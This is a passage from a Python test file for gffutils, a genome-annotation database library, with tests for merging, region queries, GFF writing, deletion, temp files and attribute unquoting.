db.update([rec], merge_strategy='replace')
num_entries += 1
print(list(db.all_features()))
assert (num_entries > 1), "Only %d left after update" % (num_entries)
# Replace
f = feature.feature_from_line(
'chr2L . testing 1 10 . + . ID=testing_feature;n=1',
dialect=db.dialect, strict=False)
f.keep_order = True
f.attributes['n'] = ['3']
db.update([f], merge_strategy='replace')
x = list(db.features_of_type('testing'))
assert len(x) == 1
assert str(x[0]) == "chr2L . testing 1 10 . + . ID=testing_feature;n=3", str(x[0])
# still should have the same number of features as before (still 2)
num_features = len(list(db.all_features()))
assert num_features == orig_num_features + 1, num_features
# Same thing, but GTF instead of GFF.
db = create.create_db(
example_filename('FBgn0031208.gtf'), ':memory:', verbose=False,
force=True, keep_order=True)
f = feature.feature_from_line('chr2L . testing 1 10 . + . gene_id "fake"; n "1"', strict=False)
f.keep_order = True
db.update([f], merge_strategy='merge')
x = list(db.features_of_type('testing'))
assert len(x) == 1
x = x[0]
x.keep_order = True
# note the trailing semicolon. That's because the db's dialect has
# ['trailing semicolon'] = True.
assert str(x) == 'chr2L . testing 1 10 . + . gene_id "fake"; n "1";', str(x)
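# Illustrative sketch (not part of the original tests): the attribute-level
# merge that merge_strategy='merge' relies on, reproduced directly with
# helpers.merge_attributes so the n="1" -> n="1,2" behaviour above can be
# seen in isolation. That the value lists are unioned is an assumption based
# on the db-level merge tested above.
def _merge_attributes_example():
    merged = helpers.merge_attributes({'n': ['1']}, {'n': ['2']})
    assert sorted(merged['n']) == ['1', '2']
    return merged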
class BaseDB(object):
"""
Generic test class. Run different versions by subclassing and overriding orig_fn.
"""
orig_fn = None
def setup(self):
def gff_id_func(f):
if 'ID' in f.attributes:
return f.attributes['ID'][0]
elif 'Name' in f.attributes:
return f.attributes['Name'][0]
else:
return '{0.featuretype}:{0.seqid}:{0.start}-{0.end}:{0.strand}'.format(f)
def gtf_id_func(f):
if f.featuretype == 'gene':
if 'gene_id' in f.attributes:
return f.attributes['gene_id'][0]
elif f.featuretype == 'transcript':
if 'transcript_id' in f.attributes:
return f.attributes['transcript_id'][0]
else:
return '{0.featuretype}:{0.seqid}:{0.start}-{0.end}:{0.strand}'.format(f)
if self.orig_fn.endswith('.gtf'): id_func = gtf_id_func
if self.orig_fn.endswith('.gff'): id_func = gff_id_func
self.db = create.create_db(
self.orig_fn,
':memory:',
id_spec=id_func,
merge_strategy='create_unique',
verbose=False,
keep_order=True
)
self.c = self.db.conn.cursor()
self.dialect = self.db.dialect
def table_test(self):
expected_tables = ['features', 'relations', 'meta', 'directives', 'autoincrements', 'duplicates', 'sqlite_stat1']
self.c.execute('select name from sqlite_master where type="table"')
observed_tables = [i[0] for i in self.c.execute('select name from sqlite_master where type="table"')]
assert set(expected_tables) == set(observed_tables), observed_tables
def _count1(self,featuretype):
"""Count using SQL"""
self.c.execute('select count() from features where featuretype = ?',(featuretype,))
results = self.c.fetchone()[0]
print('count1("%s") says: %s' % (featuretype,results))
return results
def _count2(self,featuretype):
"""Count GFF lines"""
cnt = 0
for line in open(self.orig_fn):
if line.startswith('#'):
continue
L = line.split()
if len(L) < 3:
continue
if L[2] == featuretype:
cnt += 1
print('count2("%s") says: %s' % (featuretype, cnt))
return cnt
def _count3(self,featuretype):
"""Count with the count_features_of_type method"""
results = self.db.count_features_of_type(featuretype)
print('count3("%s") says: %s' % (featuretype, results))
return results
def _count4(self,featuretype):
"""Count by iterating over all features of this type"""
cnt = 0
for i in self.db.features_of_type(featuretype):
cnt += 1
print('count4("%s") says: %s' % (featuretype,cnt))
return cnt
def featurecount_test(self):
# Right number of each featuretype, using multiple different ways of
# counting?
print('format:', self.dialect['fmt'])
expected_feature_counts = expected.expected_feature_counts[self.dialect['fmt']]
for featuretype, expected_count in expected_feature_counts.items():
rawsql_cnt = self._count1(featuretype)
fileparsed_cnt = self._count2(featuretype)
count_feature_of_type_cnt = self._count3(featuretype)
iterator_cnt = self._count4(featuretype)
print("expected count:", expected_count)
assert rawsql_cnt == count_feature_of_type_cnt == iterator_cnt == fileparsed_cnt == expected_count
def _expected_parents(self):
if self.dialect['fmt'] == 'gff3':
parents1 = expected.GFF_parent_check_level_1
parents2 = expected.GFF_parent_check_level_2
if self.dialect['fmt'] == 'gtf':
parents1 = expected.GTF_parent_check_level_1
parents2 = expected.GTF_parent_check_level_2
return parents1, parents2
def test_parents_level_1(self):
parents1, parents2 = self._expected_parents()
for child, expected_parents in parents1.items():
observed_parents = [i.id for i in self.db.parents(child, level=1)]
print('observed parents for %s:' % child, set(observed_parents))
print('expected parents for %s:' % child, set(expected_parents))
assert set(observed_parents) == set(expected_parents)
def test_parents_level_2(self):
parents1, parents2 = self._expected_parents()
for child, expected_parents in parents2.items():
observed_parents = [i.id for i in self.db.parents(child, level=2)]
print(self.db[child])
print('observed parents for %s:' % child, set(observed_parents))
print('expected parents for %s:' % child, set(expected_parents))
assert set(observed_parents) == set(expected_parents)
def test_bed12(self):
if self.__class__ == TestGFFClass:
kwargs = dict(block_featuretype='exon', thick_featuretype='CDS', name_field='ID')
if self.__class__ == TestGTFClass:
kwargs = dict(block_featuretype='exon', thick_featuretype='CDS', name_field='transcript_id')
obs = self.db.bed12('FBtr0300689', **kwargs)
exp = "chr2L 7528 9484 FBtr0300689 0 + 7679 8610 0,0,0 2 588,1292 0,664"
assert obs == exp
obs = self.db.bed12('FBtr0300690', **kwargs)
exp = "chr2L 7528 9484 FBtr0300690 0 + 7679 9276 0,0,0 3 588,397,817 0,664,1139"
assert obs == exp
class TestGFFClass(BaseDB):
orig_fn = example_filename('FBgn0031208.gff')
class TestGTFClass(BaseDB):
orig_fn = example_filename('FBgn0031208.gtf')
def test_random_chr():
"""
Test on GFF files with random chromosome events.
"""
gff_fname = gffutils.example_filename("random-chr.gff")
db = helpers.get_gff_db(gff_fname)
# Test that we can get children of only a selected type
gene_id = \
"chr1_random:165882:165969:-@chr1_random:137473:137600:-@chr1_random:97006:97527:-"
mRNAs = db.children(gene_id, featuretype="mRNA")
for mRNA_entry in mRNAs:
assert (mRNA_entry.featuretype == "mRNA"), \
"Not all entries are of type mRNA! %s" \
%(",".join([entry.featuretype for entry in mRNAs]))
print("Parsed random chromosome successfully.")
def test_gffwriter():
"""
Test GFFWriter.
"""
print("Testing GFF writer..")
fn = gffutils.example_filename("unsanitized.gff")
# Make a copy of it as temporary named file
temp_f = tempfile.NamedTemporaryFile(delete=False)
temp_fname_source = temp_f.name
shutil.copy(fn, temp_fname_source)
# Now write file in place
source_first_line = open(temp_fname_source, "r").readline().strip()
assert (not source_first_line.startswith("#GFF3")), \
"unsanitized.gff should not have a gffutils-style header."
db_in = gffutils.create_db(fn, ":memory:", keep_order=True)
# Fetch first record
rec = six.next(db_in.all_features())
##
## Write GFF file in-place test
##
print("Testing in-place writing")
gff_out = gffwriter.GFFWriter(temp_fname_source,
in_place=True,
with_header=True)
gff_out.write_rec(rec)
gff_out.close()
# Ensure that the file was written with header
rewritten = open(temp_fname_source, "r")
new_header = rewritten.readline().strip()
assert new_header.startswith("#GFF3"), \
"GFFWriter serialized files should have a #GFF3 header."
print(" - Wrote GFF file in-place successfully.")
##
## Write GFF file to new file test
##
print("Testing writing to new file")
new_file = tempfile.NamedTemporaryFile(delete=False)
gff_out = gffwriter.GFFWriter(new_file.name)
gff_out.write_rec(rec)
gff_out.close()
new_line = open(new_file.name, "r").readline().strip()
assert new_line.startswith("#GFF3"), \
"GFFWriter could not write to a new GFF file."
print(" - Wrote to new file successfully.")
# def test_attributes_modify():
# """
# Test that attributes can be modified in a GFF record.
# TODO: This test case fails?
# """
# # Test that attributes can be modified
# db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'), testdbfn_gff,
# verbose=False,
# force=True)
# gene_id = "FBgn0031208"
# gene_childs = list(db.children(gene_id))
# print("First child is not an mRNA")
# print(gene_childs[0].featuretype)
# assert str(gene_childs[0].attributes) == 'ID=FBtr0300689;Name=CG11023-RB;Parent=FBgn0031208;Dbxref=FlyBase_Annotation_IDs:CG11023-RB;score_text=Strongly Supported;score=11'
# gene_childs[0].attributes["ID"] = "Modified"
# assert str(gene_childs[0].attributes) == 'ID=Modified;Name=CG11023-RB;Parent=FBgn0031208;Dbxref=FlyBase_Annotation_IDs:CG11023-RB;score_text=Strongly Supported;score=11;ID=Modified'
# ###
# ### NOTE: Would be ideal if database checked that this
# ### change leaves "dangling" children; i.e. children
# ### GFF nodes that point to Parent that does not exist.
# ###
def test_create_db_from_iter():
"""
Test creation of FeatureDB from iterator.
"""
print("Testing creation of DB from iterator")
db_fname = gffutils.example_filename("gff_example1.gff3")
db = gffutils.create_db(db_fname, ":memory:", keep_order=True)
def my_iterator():
for rec in db.all_features():
yield rec
new_db = gffutils.create_db(my_iterator(), ":memory:", keep_order=True)
print(list(new_db.all_features()))
gene_feats = new_db.all_features(featuretype="gene")
assert (len(list(gene_feats)) != 0), "Could not load genes from GFF."
def test_sanitize_gff():
"""
    Test sanitization of GFF. This should probably be merged with the GFF
    cleaning code unless the two are intended to have different functionality.
"""
# Get unsanitized GFF
fn = gffutils.example_filename("unsanitized.gff")
# Get its database
db = helpers.get_gff_db(fn)
# Sanitize the GFF
sanitized_recs = helpers.sanitize_gff_db(db)
    # Ensure that sanitization worked, meaning all
# starts must be less than or equal to stops
for rec in sanitized_recs.all_features():
assert (rec.start <= rec.stop), "Sanitization failed."
print("Sanitized GFF successfully.")
def test_region():
db_fname = gffutils.example_filename("FBgn0031208.gff")
db = gffutils.create_db(db_fname, ":memory:", keep_order=True)
def _check(item):
kwargs, expected = item
try:
obs = list(db.region(**kwargs))
assert len(obs) == expected, \
'expected %s got %s' % (expected, len(obs))
except expected:
pass
regions = [
# previously failed, see issue #45
(dict(seqid='chr2L', start=1, end=2e9, completely_within=True), 27),
(dict(region='chr2L', start=0), ValueError),
(dict(region='chr2L', end=0), ValueError),
(dict(region='chr2L', seqid=0), ValueError),
# these coords should catch everything
(dict(region="chr2L:7529-12500"), 27),
# stranded versions:
(dict(region="chr2L:7529-12500", strand='.'), 0),
(dict(region="chr2L:7529-12500", strand='+'), 21),
(dict(region="chr2L:7529-12500", strand='-'), 6),
# different ways of selecting only that last exon in the last gene:
(dict(seqid='chr2L', start=11500, featuretype='exon'), 1),
(dict(seqid='chr2L', start=9500, featuretype='exon', strand='+'), 1),
# alternative method
(dict(seqid='chr2L', start=7529, end=12500), 27),
# since default completely_within=False, this catches anything that
# falls after 7680. So it only excludes the 5'UTR, which ends at 7679.
(dict(seqid='chr2L', start=7680), 26),
# but completely_within=True will exclude the gene and mRNAs, first
# exon and the 5'UTR
(dict(seqid='chr2L', start=7680, completely_within=True), 22),
# similarly, this will *exclude* anything before 7680
(dict(seqid='chr2L', end=7680), 5),
# and also similarly, this will only get us the 5'UTR which is the only
# feature falling completely before 7680
(dict(seqid='chr2L', end=7680, completely_within=True), 1),
# and there's only features from chr2L in this file, so this catches
# everything too
(dict(region="chr2L"), 27),
# using seqid should work similarly to `region` with only chromosome
(dict(seqid='chr2L'), 27),
# nonexistent
(dict(region='nowhere'), 0),
]
for item in regions:
yield _check, item
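# Illustrative sketch (not part of the original tests): the completely_within
# distinction exercised above, shown in isolation. With the default
# completely_within=False a feature only needs to overlap the queried region;
# with completely_within=True it must lie entirely inside it, so the second
# query can never return more features than the first.
def _region_modes_example(db):
    overlapping = list(db.region(seqid='chr2L', start=7680))
    contained = list(db.region(seqid='chr2L', start=7680, completely_within=True))
    assert len(contained) <= len(overlapping)
    return overlapping, contained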
def test_nonascii():
# smoke test (prev. version returned Unicode)
#
db = gffutils.create_db(gffutils.example_filename('nonascii'), ":memory:",
keep_order=True)
for i in db.all_features():
# this works in IPython, or using nosetests --with-doctest...
try:
print(i)
# ...but fails using plain nosetests or when using regular Python
# interpreter
except UnicodeEncodeError:
print(six.text_type(i))
def test_feature_merge():
# both "n" attribute and "source" field should be merged, since
# force_merge_fields=['source'].
gtfdata = dedent("""
chr1 a testing 1 10 . + . gene_id "fake"; n "2";
chr1 b testing 1 10 . + . gene_id "fake"; n "1";
""")
db = gffutils.create_db(gtfdata, ":memory:", from_string=True,
merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['source'], keep_order=True,
sort_attribute_values=True)
assert db.dialect['fmt'] == 'gtf'
assert len(list(db.all_features())) == 1
x = db['fake']
x.keep_order = True
x.attributes['n'].sort()
assert str(x) == 'chr1 a,b testing 1 10 . + . gene_id "fake"; n "1,2";', str(x)
gffdata = dedent("""
chr1 a testing 1 10 . + . gene_id="fake"; n="2";
chr1 b testing 1 10 . + . gene_id="fake"; n="1";
""")
db = gffutils.create_db(gffdata, ":memory:", from_string=True,
merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['source'], keep_order=True)
assert db.dialect['fmt'] == 'gff3'
assert len(list(db.all_features())) == 1
x = db['fake']
x.attributes['n'].sort()
x.keep_order = True
assert str(x) == 'chr1 a,b testing 1 10 . + . gene_id="fake"; n="1,2";', str(x)
# But when not using force_merge_fields, there should be separate entries;
# accessing fake and fake_1 should not give FeatureNotFound errors.
db = gffutils.create_db(gtfdata, ':memory:', from_string=True,
merge_strategy='merge', id_spec='gene_id',
keep_order=True)
assert len(list(db.all_features())) == 2
x = db['fake']
y = db['fake_1']
db = gffutils.create_db(gffdata, ':memory:', from_string=True,
merge_strategy='merge', id_spec='gene_id',
keep_order=True)
assert len(list(db.all_features())) == 2
x = db['fake']
y = db['fake_1']
assert_raises(ValueError, gffutils.create_db, gtfdata, ":memory:",
from_string=True, merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['start'], keep_order=True)
# test that warnings are raised because of strand and frame
with warnings.catch_warnings(record=True) as w:
gffdata = dedent("""
chr1 a testing 1 10 . + . gene_id="fake"; n="2";
chr1 a testing 1 10 . - 1 gene_id="fake"; n="1";
""")
db = gffutils.create_db(gffdata, ":memory:", from_string=True,
merge_strategy='merge', id_spec='gene_id',
force_merge_fields=['strand', 'frame'],
keep_order=True, sort_attribute_values=True)
assert db.dialect['fmt'] == 'gff3'
assert len(list(db.all_features())) == 1
x = db['fake']
x.keep_order = True
x.attributes['n'].sort()
assert str(x) == 'chr1 a testing 1 10 . +,- .,1 gene_id="fake"; n="1,2";', str(x)
assert len(w) == 2
def test_add_relation():
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gff'), ':memory:', keep_order=True)
L = len(list(db.children('FBgn0031208:3')))
assert L == 0, L
def func(parent, child):
child['Parent'] = child['Parent'] + [parent.id]
child['exon_parent'] = [parent.id]
return child
db.add_relation('FBgn0031208:3', 'CDS_FBgn0031208:1_737', 1, child_func=func)
L = len(list(db.children('FBgn0031208:3')))
assert L == 1, L
L = list(db.children('FBgn0031208:3'))
x = L[0]
assert 'FBgn0031208:3' in x['Parent']
assert x['exon_parent'] == ['FBgn0031208:3']
def test_create_db_from_url():
"""
Test creation of FeatureDB from URL iterator.
"""
print("Testing creation of DB from URL iterator")
    # Initially run SimpleHTTPServer on port 0 so the OS assigns the first available port
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", 0), Handler)
port = str(httpd.socket.getsockname()[1])
print("serving at port", port)
# Serving test/data folder
served_folder = gffutils.example_filename('')
savedir = os.getcwd()
os.chdir(served_folder)
print("Starting SimpleHTTPServer in thread")
server_thread = threading.Thread(target=httpd.serve_forever)
    server_thread.daemon = True
server_thread.start()
try:
url = ''.join(['http://localhost:', port, '/gff_example1.gff3'])
db = gffutils.create_db(url, ":memory:", keep_order=True)
def my_iterator():
for rec in db.all_features():
yield rec
new_db = gffutils.create_db(my_iterator(), ":memory:", keep_order=True)
print(list(new_db.all_features()))
gene_feats = new_db.all_features(featuretype="gene")
assert (len(list(gene_feats)) != 0), "Could not load genes from GFF."
url = ''.join(['http://localhost:', port, '/gff_example1.gff3.gz'])
db = gffutils.create_db(url, ":memory:", keep_order=True)
def my_iterator():
for rec in db.all_features():
yield rec
new_db = gffutils.create_db(my_iterator(), ":memory:", keep_order=True)
print(list(new_db.all_features()))
gene_feats = new_db.all_features(featuretype="gene")
assert (len(list(gene_feats)) != 0), "Could not load genes from GFF."
finally:
print('Server shutdown.')
httpd.shutdown()
server_thread.join()
os.chdir(savedir)
def test_empty_files():
fn = tempfile.NamedTemporaryFile(delete=False).name
a = open(fn, 'w')
a.close()
assert_raises(ValueError, gffutils.create_db, fn, fn + '.db')
def test_false_function():
# smoke test: before commit ce4b7671f, this would raise "TypeError: object
# of type 'function' has no len()"
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'),
':memory:',
keep_order=True,
id_spec=lambda x: False,
merge_strategy='create_unique'
)
def test_inspect():
file_results = inspect.inspect(gffutils.example_filename('FBgn0031208.gff'), verbose=False)
db_results = inspect.inspect(
gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'),
':memory:'),
verbose=False
)
expected = {
'featuretype': {
'intron': 3,
'five_prime_UTR': 1,
'exon': 6,
'mRNA': 4,
'CDS': 5,
'pcr_product': 1,
'three_prime_UTR': 2,
'protein': 2,
'gene': 3,
},
'feature_count': 27,
'chrom': {
'chr2L': 27,
},
'attribute_keys': {
u'': 3,
'Dbxref': 6,
'Name': 19,
'Parent': 20,
' Parent': 1,
'score_text': 2,
'gbunit': 1,
'derived_computed_cyto': 1,
'Derives_from': 2,
'derived_molecular_weight': 2,
'score': 2,
'ID': 25,
'derived_isoelectric_point': 2,
'Ontology_term': 1,
}
}
assert file_results == db_results == expected
    # file and db results agree because the db is created from that same file
kwargs = dict(
look_for=['chrom', 'strand', 'attribute_keys', 'featuretype'],
verbose=False,
limit=10,
)
file_results = inspect.inspect(
gffutils.example_filename('FBgn0031208.gff'),
**kwargs
)
iter_results = inspect.inspect(
iter(iterators._FileIterator(gffutils.example_filename('FBgn0031208.gff'))),
**kwargs
)
db_results = inspect.inspect(
gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'),
':memory:'),
**kwargs
)
expected = {
'attribute_keys': {
u'Name': 9,
u'Parent': 9,
u'score_text': 2,
u'gbunit': 1,
u'derived_computed_cyto': 1,
u'score': 2,
u'Dbxref': 3,
u'ID': 8,
u'Ontology_term': 1,
},
'feature_count': 10,
'chrom': {u'chr2L': 10},
'strand': {u'+': 10},
'featuretype': {
u'five_prime_UTR': 1,
u'exon': 3,
u'mRNA': 2,
u'CDS': 1,
'intron': 2,
u'gene': 1}
}
assert file_results == db_results == iter_results == expected
def test_delete():
db_fname = gffutils.example_filename("gff_example1.gff3")
# incrementally delete all features
db = gffutils.create_db(db_fname, ':memory:')
ids = [i.id for i in db.all_features()]
current = set(ids)
for _id in ids:
db.delete(_id)
expected = current.difference([_id])
current = set([i.id for i in db.all_features()])
assert current == expected, (current, expected)
assert len(current) == 0
# same thing, but as a list of Feature objects rather than string IDs
db = gffutils.create_db(db_fname, ':memory:')
features = list(db.all_features())
current = set(features)
for feature in features:
db.delete(feature)
expected = current.difference([feature])
current = set(list(db.all_features()))
assert current == expected, (current, expected)
assert len(current) == 0, current
# same thing, but use a FeatureDB.
db1 = gffutils.create_db(db_fname, ':memory:')
db2 = gffutils.create_db(db_fname, ':memory:')
db1.delete(db2)
assert len(list(db1.all_features())) == 0
db = gffutils.create_db(db_fname, ':memory:')
db.delete('nonexistent')
def test_iterator_update():
db_fname = gffutils.example_filename("gff_example1.gff3")
db = gffutils.create_db(db_fname, ':memory:')
assert len(list(db.all_features())) == 12
orig_exon_coords = set([(i.start, i.stop) for i in db.features_of_type('exon')])
# reset all features to have the same coords of start=1, stop=100
def gen():
for i in db.features_of_type('gene'):
i.start = 1
i.stop = 100
yield i
db.update(gen(), merge_strategy='replace')
assert len(list(db.all_features())) == 12
assert len(list(db.features_of_type('gene'))) == 1
g = six.next(db.features_of_type('gene'))
assert g.start == 1, g.start
assert g.stop == 100, g.stop
# exons should have remained unchanged.
assert orig_exon_coords == set([(i.start, i.stop) for i in db.features_of_type('exon')])
def _transform(f):
f.start = 1
f.stop = 100
return f
db_fname = gffutils.example_filename("gff_example1.gff3")
db = gffutils.create_db(db_fname, ':memory:')
db.update(db.features_of_type('gene'), merge_strategy='replace', transform=_transform)
assert len(list(db.all_features())) == 12
assert len(list(db.features_of_type('gene'))) == 1
g = six.next(db.features_of_type('gene'))
assert g.start == 1, g.start
assert g.stop == 100, g.stop
# exons should have remained unchanged.
assert orig_exon_coords == set([(i.start, i.stop) for i in db.features_of_type('exon')])
def test_tempfiles():
    # specify a writable temp dir for testing
tempdir = '/tmp/gffutils-test'
def clean_tempdir():
tempfile.tempdir = tempdir
if os.path.exists(tempdir):
shutil.rmtree(tempdir)
os.makedirs(tempdir)
clean_tempdir()
# default keep_tempfiles=False should give us nothing.
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:')
assert len(os.listdir(tempdir)) == 0
# adding keep_tempfiles=True should give us 1 tempfile for gtf...
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:', _keep_tempfiles=True)
filelist = os.listdir(tempdir)
assert len(filelist) == 1, filelist
assert filelist[0].endswith('.gffutils')
    #...and another one for gff. This time, make sure the suffix is still '.gffutils'.
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gff'), ':memory:', _keep_tempfiles=True)
filelist = os.listdir(tempdir)
assert len(filelist) == 2, filelist
for i in filelist:
assert i.endswith('.gffutils')
# OK, now delete what we have so far...
clean_tempdir()
# Make sure that works for custom suffixes
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:', _keep_tempfiles='.GTFtmp')
filelist = os.listdir(tempdir)
assert len(filelist) == 1, filelist
assert filelist[0].endswith('.GTFtmp')
clean_tempdir()
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'), ':memory:', _keep_tempfiles='.GFFtmp')
filelist = os.listdir(tempdir)
assert len(filelist) == 1, filelist
assert filelist[0].endswith('.GFFtmp')
# Test n parallel instances of gffutils across PROCESSES processes.
#
# Note that travis-ci doesn't like it when you use multiple cores, so the
# .travis.yml file sets this to 1. This also means that
# 1) `n` shouldn't be too large because travis-ci will run one at a time,
# but more importantly,
# 2) this will only truly test parallel processes on a local machine with
# multiple cpus.
clean_tempdir()
# .travis.yml sets the PROCESSES env var; otherwise use all available.
PROCESSES = int(os.environ.get("PROCESSES", multiprocessing.cpu_count()))
pool = multiprocessing.Pool(PROCESSES)
n = 100
res = pool.map(make_db, range(n))
assert sorted(list(res)) == list(range(n))
filelist = os.listdir(tempdir)
assert len(filelist) == n, len(filelist)
expected = dedent("""\
FBtr0300689 chr2L 7529 9484 + transcript 4681 {"transcript_id":["FBtr0300689"],"gene_id":["FBgn0031208"]}
FBgn0031208 chr2L 7529 9484 + gene 4681 {"gene_id":["FBgn0031208"]}
FBtr0300690 chr2L 7529 9484 + transcript 4681 {"transcript_id":["FBtr0300690"],"gene_id":["FBgn0031208"]}
transcript_Fk_gene_1 chr2L 10000 11000 - transcript 4681 {"transcript_id":["transcript_Fk_gene_1"],"gene_id":["Fk_gene_1"]}
Fk_gene_1 chr2L 10000 11000 - gene 4681 {"gene_id":["Fk_gene_1"]}
transcript_Fk_gene_2 chr2L 11500 12500 - transcript 4681 {"transcript_id":["transcript_Fk_gene_2"],"gene_id":["Fk_gene_2"]}
Fk_gene_2 chr2L 11500 12500 - gene 4681 {"gene_id":["Fk_gene_2"]}
""")
def matches_expected(fn):
"""
Python 3 has unpredictable dictionary ordering. This function checks
the *semantic* similarity of lines by parsing the attributes into
        a dictionary.
"""
exp_features = expected.splitlines(True)
new_features = list(open(fn))
assert len(exp_features) == len(new_features)
for expline, newline in zip(exp_features, new_features):
exp_toks = expline.split()
new_toks = newline.split()
assert exp_toks[:-1] == new_toks[:-1]
assert json.loads(exp_toks[-1]) == json.loads(new_toks[-1])
# make sure that each of the `n` files matches the expected output.
for fn in filelist:
fn = os.path.join(tempdir, fn)
try:
matches_expected(fn)
except AssertionError:
            print(''.join(difflib.ndiff(expected.splitlines(True), open(fn).read().splitlines(True))))
raise
clean_tempdir()
def test_disable_infer():
"""
tests the new semantics for disabling gene/transcript inference
"""
# To start, we construct a GTF db by inferring genes and transcripts
db = gffutils.create_db(gffutils.example_filename('FBgn0031208.gtf'), ':memory:')
# Then create a file missing transcripts, and another missing genes.
import tempfile
tempfile.tempdir = None
no_transcripts = open(tempfile.NamedTemporaryFile(delete=False).name, 'w')
no_genes = open(tempfile.NamedTemporaryFile(delete=False).name, 'w')
for feature in db.all_features():
if feature.featuretype != 'transcript':
no_transcripts.write(str(feature) + '\n')
if feature.featuretype != 'gene':
no_genes.write(str(feature) + '\n')
no_genes.close()
no_transcripts.close()
no_tx_db = gffutils.create_db(no_transcripts.name, ':memory:', disable_infer_transcripts=True)
no_gn_db = gffutils.create_db(no_genes.name, ':memory:', disable_infer_genes=True)
no_xx_db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'),
':memory:',
disable_infer_genes=True,
disable_infer_transcripts=True
)
# no transcripts but 3 genes
assert len(list(no_tx_db.features_of_type('transcript'))) == 0
assert len(list(no_tx_db.features_of_type('gene'))) == 3
# no genes but 4 transcripts
assert len(list(no_gn_db.features_of_type('gene'))) == 0
assert len(list(no_gn_db.features_of_type('transcript'))) == 4
# no genes or transcripts
assert len(list(no_xx_db.features_of_type('gene'))) == 0
assert len(list(no_xx_db.features_of_type('transcript'))) == 0
def test_deprecation_handler():
return
# TODO: when infer_gene_extent actually gets deprecated, test here.
assert_raises(ValueError, gffutils.create_db,
gffutils.example_filename('FBgn0031208.gtf'),
':memory:',
infer_gene_extent=False)
def test_nonsense_kwarg():
assert_raises(TypeError,
gffutils.create_db,
gffutils.example_filename('FBgn0031208.gtf'),
":memory:",
asdf=True)
def test_infer_gene_extent():
# Before we deprecate this, make sure it still works but emits a warning.
with warnings.catch_warnings(record=True) as w:
gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'),
':memory:',
infer_gene_extent=False)
assert len(w) == 1
# From #79
def test_issue_79():
gtf = gffutils.example_filename('keep-order-test.gtf')
db = gffutils.create_db(gtf, 'tmp.db',
disable_infer_genes=False,
disable_infer_transcripts=False,
id_spec={"gene": "gene_id", "transcript": "transcript_id"},
merge_strategy="create_unique",
keep_order=True,
force=True)
exp = open(gtf).read()
obs = '\n'.join([str(i) for i in db.all_features()])
exp_1 = exp.splitlines(True)[0].strip()
obs_1 = obs.splitlines(True)[0].strip()
print('EXP')
print(exp_1)
print('OBS')
print(obs_1)
print('DIFF')
print(''.join(difflib.ndiff([exp_1], [obs_1])))
assert obs_1 == exp_1
def test_for_analyze():
db = gffutils.create_db(
gffutils.example_filename('FBgn0031208.gtf'),
'deleteme',
force=True
)
assert db._analyzed()
db.execute('DROP TABLE sqlite_stat1')
assert not db._analyzed()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
db2 = gffutils.FeatureDB('deleteme')
assert len(w) == 1
assert "analyze" in str(w[-1].message)
db.analyze()
assert db._analyzed()
os.unlink('deleteme')
def test_issue_82():
# key-val separator is inside an unquoted attribute value
x = (
'Spenn-ch12\tsgn_markers\tmatch\t2621812\t2622049\t.\t+\t.\t'
'Alias=SGN-M1347;ID=T0028;Note=marker name(s): T0028 SGN-M1347 |identity=99.58|escore=2e-126'
)
y = feature.feature_from_line(x)
assert y.attributes['Note'] == ['marker name(s): T0028 SGN-M1347 |identity=99.58|escore=2e-126']
gffutils.create_db(gffutils.example_filename('keyval_sep_in_attrs.gff'), ':memory:')
def test_sequence():
fasta = gffutils.example_filename('dm6-chr2L.fa')
f = feature.feature_from_line(
'chr2L FlyBase gene 154 170 . + . ID=one;')
seq = f.sequence(fasta)
assert seq == 'aCGAGATGATAATATAT'
assert len(seq) == len(f)
f.strand = '-'
seq = f.sequence(fasta)
assert seq == 'ATATATTATCATCTCGt'
assert len(seq) == len(f)
def test_issue_85():
    # when start or stop was empty, #85 would fail. Should now work with
    # blank fields.
f = feature.feature_from_line('\t'.join([''] * 9))
# or with "." placeholders
f = feature.feature_from_line('\t'.join(['.'] * 9))
def test_unquoting():
# incoming is encoded
s = (
'chr1\tAUGUSTUS\tgene\t6950084\t6951407\t0.26\t-\t.\t'
'ID=INIL01g00009;GeneSymbol=Ndufaf6;Note=NADH dehydrogenase '
'(ubiquinone) complex I%2C assembly factor 6;GO_Terms=GO:0005743|'
'GO:0016740|GO:0009058|GO:0032981;PFam=PF00494'
)
f = feature.feature_from_line(s, keep_order=True)
# string representation should be identical
assert str(f) == s
# accessing attribute should be decoded
n = f['Note']
assert n == ['NADH dehydrogenase (ubiquinone) complex I, assembly factor 6']
def test_unreasonable_unquoting():
s = (
'chr1\t.\t.\t1\t2\t0.26\t-\t.\t'
'newline=%0A;'
'percent=%25;'
'null=%00;'
'comma=%2C;'
# The first parent is "A," (A with a comma), the second is "B%"
'Parent=A%2C,B%25,C;'
)
f = feature.feature_from_line(s, keep_order=True)
assert f.attributes['newline'][0] == '\n'
assert f.attributes['percent'][0] == '%'
assert f.attributes['null'][0] == '\x00'
assert f.attributes['comma'][0] == ','
    # Unencoded commas indicate multiple values
assert f.attributes['Parent'] == ['A,', 'B%', 'C']
assert str(f) == s
def test_unquoting_iter():
s = 'chr1\t.\tgene\t1\t2\t.\t-\t.\tID=%2C;'
tmp = tempfile.NamedTemporaryFile(delete=False).name
with open(tmp, 'w') as fout:
fout.write(s + '\n')
assert list(gffutils.iterators.DataIterator(tmp))[0]['ID'][0] == ','
def test_db_unquoting():
s = dedent(
'''
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=a;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=b;Note=%2C;
chr1\t.\tgene\t1\t2\t.\t-\t.\tID=c;Note=%2C;
